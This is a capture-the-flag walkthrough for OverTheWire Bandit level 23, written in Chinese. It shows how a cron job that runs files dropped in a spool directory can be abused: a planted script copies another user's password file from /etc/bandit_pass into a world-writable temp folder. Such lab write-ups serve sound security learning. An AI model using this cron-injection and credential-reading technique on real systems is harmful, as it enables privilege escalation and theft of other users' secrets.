Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ */ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Commands you may need to solve this level
- chmod
- cron
- crontab
- crontab(5) (use “man 5 crontab” to access this)
My Answer (Step by step)
- 連線到伺服器並登入
ssh bandit23@bandit.labs.overthewire.org -p 2220- 透過 cd 與 ls 指令前往 /etc/cron.d 目錄查看有哪些排程工作
cd /etc/cron.dls -al{{< alert info >}} 根據指令結果,發現有一個檔案 cronjob_bandit24 名稱跟下一等級相關 {{< /alert >}}
- 透過 cat 指令將檔案 cronjob_bandit24 內容呈現出來
cat cronjob_bandit24# @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null# * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null{{< alert info >}} 根據指令結果,發現此工作會執行 /usr/bin/cronjob_bandit24.sh {{< /alert >}}
- 透過 cat 指令將 sh script 呈現出來
cat /usr/bin/cronjob_bandit24.sh# #!/bin/bash
# myname=$(whoami)
# cd /var/spool/$myname/foo# echo "Executing and deleting all scripts in /var/spool/$myname/foo:"# for i in * .*;# do# if [ "$i" != "." -a "$i" != ".." ];# then# echo "Handling $i"# owner="$(stat --format "%U" ./$i)"# if [ "${owner}" = "bandit23" ]; then# timeout -s 9 60 ./$i# fi# rm -f ./$i# fi# done{{< alert info >}} 根據指令結果,發現會執行並刪除所有在 /var/spool/bandit24/foo 的 script,所以我們可以在裡面寫一個獲得 bandit24 密碼的 script {{< /alert >}}
- 透過 mktemp 與 cd 指令產生暫存資料夾並進入它
mktemp -dcd /tmp/tmp.2ZUZlHBJ3d- 透過 touch 指令產生腳本檔與密碼輸出檔,並透過 chmod 指令修改權限讓排程工作可以順利執行腳本與寫入密碼
touch a.shtouch password.txtchmod 777 -R /tmp/tmp.2ZUZlHBJ3d- 透過 vim, vi, nano 等指令編輯 a.sh script
nano a.sha.sh
#!/bin/bashcat /etc/bandit_pass/bandit24 > /tmp/tmp.2ZUZlHBJ3d/password.txt- 透過 cp 指令將腳本檔放入指定目錄,並等待它執行
cp a.sh /var/spool/bandit24/foo/a.sh- 約等一分鐘後,透過 cat 指令獲得 Level 24 密碼!
cat password.txt如果這篇文章對你有幫助,歡迎分享給更多人!
部分資訊可能已經過時